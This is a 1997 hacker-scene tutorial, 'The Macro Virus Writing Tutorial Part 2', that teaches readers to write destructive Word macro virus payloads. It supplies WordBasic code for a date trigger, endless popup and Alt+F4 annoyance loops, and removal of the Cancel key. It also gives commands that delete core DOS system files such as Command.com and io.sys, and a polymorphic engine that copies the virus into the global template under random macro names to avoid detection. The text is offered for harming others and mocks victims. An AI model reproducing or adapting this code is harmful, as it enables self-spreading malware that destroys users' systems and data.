*************************** * THE MACRO VIRUS * * WRITING TUTORIAL * * PART 2 * *************************** * * * WRITTEN BY DARK NIGHT * * OF VBB * * * *************************** LEGALESE ~~~~~~~~ I SHALL NOT BE HELD RESPONSIBLE FOR ANY DAMAGE CREATED THROUGH DIRECT OR INDIRECT USE OF THE PUBLICISED MATERIAL. THIS DOCUMENT IS COPYRIGHT 1997 TO ME, DARK NIGHT OF VBB. HEREWITH I GRANT ANYBODY LICENSE TO REDISTRIBUTE THIS DOCUMENT AS LONG AS IT IS KEPT IN WHOLE AND MY COPYRIGHT NOTICE IS NOT REMOVED. ALSO IF I FIND ANY LAMERS WHO JUST TAKE THE CODE PUBLISHED HERE AND SAY IT IS THEIR OWN I WILL SEE TO IT THAT THEY'LL BE PUNISHED.(Sure.....Sure :-))!!! INTRO TO LIFE ~~~~~ ~~ ~~~~ Yep, it's time again for another tutorial! I got so much positive feedback(and these people wouldn't leave me alone)so I decided to continue. This time I will mostly be talking about virus payloads as I presented the infection routines to you last time.... Oh yeah! The question about books on Word BAsic reached me a lot of times too! Here's a book I've been told is supposed to be good: "BEGINNING WORDBASIC PROGRAMMING", ISBN: #1874416869. Enjoy! PAYLOAD?? I'M LOST! ~~~~~~~~~ ~~~ ~~~~~ Why are you reading this then? The Payload is the bomb....The thing that does stuff besides infecting.... WHAT IS POSSIBLE? ~~~~ ~~ ~~~~~~~~~ Well, there are a lot of things you can do... You can format harddrives,Crash word, Run other proggies(dos virii) etc. But, you don't want your virus to this every single time it is run right? So you need a check routine: If Month(Now()) = 1 And Day(Now()) = 3 Then 'Easy right? BOMB HERE ELSE 'whatever End IF The easiest method to annoy a user is to send the following very frequently: SendKeys "%"+"{F4}" This has the effect of pressing alt+f4...The problem is that word still prompts to save. Since we are in the annoying stuff right now, there is another one: Again: MsgBox"HAHAHAHAHA!" Goto Again Mean isn't it....Imagine someone working and this thing popping up one day when he opens your word document. Since his template was infected, he will see this more often :) MEAN STUFF ~~~~ ~~~~ Ok, you can get a good kick out of the above, but what if you really want to get someone? Yes, you guessed it... There's even meaner stuff :) ToolsCustomizeKeyboard .KeyCode = 27, .Category = 1, .Name = "Cancel", .Remove, .Context = 0 'The above macro looks handy for the close all function :) (To all who don't understand: It 'removes the cancel button!) Kill"C:\Autoexec.bat" Kill"C:\Config.sys" Kill"C:\Command.com" Kill"C:\io.sys" Kill"C:\msdos.sys" Finish: Ain't this mean :) I got the next one from the Nightmare Joker. Enjoy.... ToolsCustomizeKeyboard .KeyCode = 27, .Category = 1, .Name = "Cancel", .Remove, .Context = 0 SendKeys "^" + "%" + "-" Close all documents and look under File....How's your Cursor doin'? POLYMORPHIC?? ~~~~~~~~~~~~~ Yes, it is possible.... Here's a polymorphic engine which uses random names for its macros to hide is indentity. This code is from The Nightmare Joker! I translated it into English: Sub MAIN On Error Goto Done A$ = FileName$() If A$ = "" Then Goto Finish If VInstalled = 0 Then Run1 Run2 FileSaveAll 1, 1 Else Goto Done End If Done: A$ = FileName$() If A$ = "" Then Goto Finish Else Insert " " End If Finish: MsgBox "polymorph", - 8 End Sub Sub Run1 X$ = Fun$(F$, G$, H$, J$) Y$ = Fun$(F$, G$, H$, J$) Z$ = X$ + Y$ R1$ = GetDocumentVar$("VirNameDoc") CO$ = FileName$() + ":" + R1$ MacroCopy CO$, "Global:" + Z$ SetProfileString "Intl", "Info2", Z$ ToolsCustomizeKeyboard .KeyCode = 65, .Category = 2, .Name = Z$, .Add, .Context = 0 End Sub Sub Run2 X$ = Fun$(F$, G$, H$, J$) Y$ = Fun$(F$, G$, H$, J$) Z$ = X$ + Y$ R2$ = GetDocumentVar$("VirName") OC$ = FileName$() + ":" + R2$ MacroCopy OC$, "Global:" + Z$ SetProfileString "Intl", "Info1", Z$ ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = Z$, .Add, .Context = 0 End Sub Function VInstalled CC$ = GetProfileString$("Intl", "Info1") VInstalled = 0 If CountMacros(0) > 0 Then For i = 1 To CountMacros(0) If MacroName$(i, 0) = CC$ Then VInstalled = 1 End If Next i End If End Function Function Fun$(F$, G$, H$, J$) One = 1169 Two = 9294 Num = Int(Rnd() * (Two - One) + One) A$ = Str$(Num) A$ = LTrim$(A$) B$ = Mid$(A$, 1, 1) C$ = Mid$(A$, 2, 1) D$ = Mid$(A$, 3, 1) E$ = Mid$(A$, 4, 1) If B$ = "1" Then F$ = "A" If B$ = "2" Then F$ = "B" If B$ = "3" Then F$ = "C" If B$ = "4" Then F$ = "D" If B$ = "5" Then F$ = "E" If B$ = "6" Then F$ = "F" If B$ = "7" Then F$ = "G" If B$ = "8" Then F$ = "H" If B$ = "9" Then F$ = "I" If B$ = "0" Then F$ = "J" If C$ = "1" Then G$ = "H" If C$ = "2" Then G$ = "I" If C$ = "3" Then G$ = "J" If C$ = "4" Then G$ = "K" If C$ = "5" Then G$ = "L" If C$ = "6" Then G$ = "M" If C$ = "7" Then G$ = "N" If C$ = "8" Then G$ = "O" If C$ = "9" Then G$ = "P" If C$ = "0" Then G$ = "Q" If D$ = "1" Then H$ = "A" If D$ = "2" Then H$ = "B" If D$ = "3" Then H$ = "C" If D$ = "4" Then H$ = "D" If D$ = "5" Then H$ = "E" If D$ = "6" Then H$ = "F" If D$ = "7" Then H$ = "G" If D$ = "8" Then H$ = "H" If D$ = "9" Then H$ = "I" If D$ = "0" Then H$ = "J" If E$ = "1" Then J$ = "R" If E$ = "2" Then J$ = "S" If E$ = "3" Then J$ = "T" If E$ = "4" Then J$ = "U" If E$ = "5" Then J$ = "V" If E$ = "6" Then J$ = "W" If E$ = "7" Then J$ = "X" If E$ = "8" Then J$ = "Y" If E$ = "9" Then J$ = "Z" If E$ = "0" Then J$ = "Q" Fun$ = F$ + G$ + H$ + J$ End Function I'm going to leave you withou explination at this point because if you have no idea what this is about, then this is nothing for you as a beginner! WHERE TO? ~~~~~ ~~~ I don't know when I will continue this, but I'm sure that if there are any news that I will gladly continue. As usual you can reach me at Dark_Night@ilf.net with any questions! Also I would appreciate any future topic suggestions!